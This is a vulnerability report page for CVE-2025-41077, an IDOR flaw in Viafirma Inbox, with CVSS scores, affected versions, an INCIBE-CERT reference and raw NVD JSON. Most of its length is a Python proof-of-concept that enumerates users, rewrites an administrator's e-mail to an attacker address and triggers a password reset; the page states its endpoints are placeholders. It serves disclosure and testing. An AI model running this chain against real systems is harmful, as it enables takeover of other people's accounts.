Security Vulnerability Report
CVE-2025-41077 CVSS 8.1 HIGH

CVE-2025-41077

Published: 2026-01-12 15:16:03
Last Modified: 2026-01-29 20:09:58

Description

IDOR vulnerability has been found in Viafirma Inbox v4.5.13 that allows any authenticated user without privileges in the application to list all users, access and modify their data. This allows the user's email addresses to be modified and, subsequently, using the password recovery functionality to access the application by impersonating any user, including those with administrative permissions.

CVSS Details (NVD primary CVSS v3.1 score; the raw JSON below also carries the CNA's secondary CVSS v4.0 vector, which scores 8.6 HIGH with the same network/low-privilege/no-interaction profile)

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:viafirma:inbox:*:*:*:*:*:-:*:* - VULNERABLE
Viafirma Inbox versions before 4.5.27 (NVD configuration on this page: `versionEndExcluding` = 4.5.27). The description names v4.5.13 as the version in which the IDOR was found, so a "< 4.5.13" range understates the affected set; per the NVD data, treat every release below 4.5.27 as vulnerable.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that step 2 of the script overwrites a live account's e-mail address (the precondition for the password-recovery takeover), which is destructive and not reversed by the script: run it only against a test instance, and record the original address first so it can be restored. The endpoint paths and JSON field names in the script are illustrative placeholders — the advisory does not publish them — and must be confirmed against the target application.
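# CVE-2025-41077 PoC - Viafirma Inbox IDOR (CWE-639) - authorized testing only.
#
# The advisory describes the flaw only at a high level: an authenticated user
# without privileges can list all users and modify their data (including the
# e-mail address), then use password recovery to take over any account,
# including administrators. The endpoint paths, JSON field names ('id',
# 'email', 'role') and the role value 'admin' used below are NOT published in
# the advisory; they are placeholders that must be confirmed against the
# target application before relying on this script.
#
# WARNING: modify_user_email() is destructive - it rewrites a real account's
# e-mail address and nothing here restores it. Capture the original value from
# enumerate_users() first (the main block prints it) so it can be put back.
import json
import os

import requests

# Target, credentials and recipient address may be supplied via the
# environment; the literals are placeholders kept for backward compatibility.
TARGET_URL = os.environ.get("TARGET_URL", "https://target-viafirma.com").rstrip("/")
ATTACKER_TOKEN = os.environ.get("ATTACKER_TOKEN", "attacker_auth_token_here")
ATTACKER_EMAIL = os.environ.get("ATTACKER_EMAIL", "attacker@example.com")
# Every request carries a timeout so the run cannot hang on an unresponsive host.
REQUEST_TIMEOUT = 15


def _auth_headers(token: str = ATTACKER_TOKEN) -> dict[str, str]:
    """Return the bearer-auth JSON headers sent on the authenticated requests."""
    return {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }


def find_admin_user(users: list[dict]) -> dict | None:
    """Return the first user record whose 'role' is 'admin', or None.

    The field name and role value are placeholders (see module comment).
    """
    return next((u for u in users if u.get("role") == "admin"), None)


def enumerate_users() -> list[dict]:
    """Step 1: list every user account through the IDOR-affected listing endpoint.

    A low-privilege token is expected to receive the full user list. Returns
    the parsed list of user records, or an empty list on any transport, HTTP
    or JSON failure (each failure is reported on stdout). Records are read
    with .get() because the real field names are unconfirmed.
    """
    user_list_url = f"{TARGET_URL}/api/users/list"
    try:
        response = requests.get(user_list_url, headers=_auth_headers(), timeout=REQUEST_TIMEOUT)
    except requests.RequestException as exc:
        print(f"[-] User listing request failed: {exc}")
        return []
    if response.status_code != 200:
        print(f"[-] User listing returned HTTP {response.status_code}: {response.text[:200]}")
        return []
    try:
        users = response.json()
    except ValueError:
        print("[-] User listing response is not JSON")
        return []
    if not isinstance(users, list):
        # The response shape is unconfirmed; refuse to guess at a wrapper key.
        print(f"[-] Unexpected user listing shape: {type(users).__name__}")
        return []
    print(f"[+] Found {len(users)} users:")
    for user in users:
        print(f" - ID: {user.get('id')}, Email: {user.get('email')}, Role: {user.get('role')}")
    return users


def modify_user_email(target_user_id, new_email) -> bool:
    """Step 2: overwrite another user's e-mail via the IDOR-affected update endpoint.

    Args:
        target_user_id: id of the victim account (taken from enumerate_users()).
        new_email: attacker-controlled address that will receive recovery mail.

    Returns True only on HTTP 200. Destructive: the previous address is lost
    unless captured beforehand.
    """
    modify_url = f"{TARGET_URL}/api/users/{target_user_id}/update"
    # The server is expected to honour the caller-supplied user id instead of
    # binding the update to the authenticated account (CWE-639).
    payload = {"email": new_email, "user_id": target_user_id}
    try:
        response = requests.post(
            modify_url, headers=_auth_headers(), json=payload, timeout=REQUEST_TIMEOUT
        )
    except requests.RequestException as exc:
        print(f"[-] Failed to modify email: {exc}")
        return False
    if response.status_code == 200:
        print(f"[+] Successfully modified email for user {target_user_id} to {new_email}")
        return True
    print(f"[-] Failed to modify email: {response.text}")
    return False


def reset_password_via_email(target_user_id, attacker_controlled_email) -> bool:
    """Step 3: trigger password recovery for the hijacked address.

    Args:
        target_user_id: accepted for call compatibility only; the recovery
            endpoint is keyed by e-mail, so the id is never sent.
        attacker_controlled_email: the address written in step 2; the reset
            link is delivered there.

    Returns True only on HTTP 200. The recovery endpoint is unauthenticated,
    so no bearer token is sent.
    """
    reset_url = f"{TARGET_URL}/api/auth/password-reset"
    payload = {"email": attacker_controlled_email}
    try:
        response = requests.post(
            reset_url,
            headers={"Content-Type": "application/json"},
            json=payload,
            timeout=REQUEST_TIMEOUT,
        )
    except requests.RequestException as exc:
        print(f"[-] Password reset failed: {exc}")
        return False
    if response.status_code == 200:
        print("[+] Password reset email sent to attacker-controlled email")
        return True
    print(f"[-] Password reset failed: {response.text}")
    return False


if __name__ == "__main__":
    # Example chain: enumerate, pick an administrator, hijack its e-mail, then
    # request a reset. Each step stops the chain on failure.
    users = enumerate_users()
    admin_user = find_admin_user(users) if users else None
    if admin_user is None:
        print("[-] No admin user found; nothing to do")
    else:
        # Printed so the tester can restore the account after the test.
        print(f"[*] Original admin email (restore after testing): {admin_user.get('email')}")
        if modify_user_email(admin_user.get("id"), ATTACKER_EMAIL):
            reset_password_via_email(admin_user.get("id"), ATTACKER_EMAIL)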

References

https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-viafirma-products — INCIBE-CERT advisory "Multiple vulnerabilities in Viafirma products" (tagged Third Party Advisory in the NVD record below).

Raw JSON Data

{"cve": {"id": "CVE-2025-41077", "sourceIdentifier": "[email protected]", "published": "2026-01-12T15:16:03.057", "lastModified": "2026-01-29T20:09:57.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IDOR vulnerability has been found in Viafirma Inbox v4.5.13 that allows any authenticated user without privileges in the application to list all users, access and modify their data. This allows the user's email addresses to be modified and, subsequently, using the password recovery functionality to access the application by impersonating any user, including those with administrative permissions."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad IDOR en Viafirma Inbox v4.5.13 que permite a cualquier usuario autenticado sin privilegios en la aplicación listar a todos los usuarios, acceder y modificar sus datos. Esto permite que las direcciones de correo electrónico de los usuarios sean modificadas y, posteriormente, utilizando la funcionalidad de recuperación de contraseña, acceder a la aplicación suplantando a cualquier usuario, incluyendo aquellos con permisos administrativos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", 
"modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:viafirma:inbox:*:*:*:*:*:-:*:*", "versionEndExcluding": "4.5.27", "matchCriteriaId": "A8EAEA5C-21C2-46A7-9151-5FCC1A8AF3DF"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-viafirma-products", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}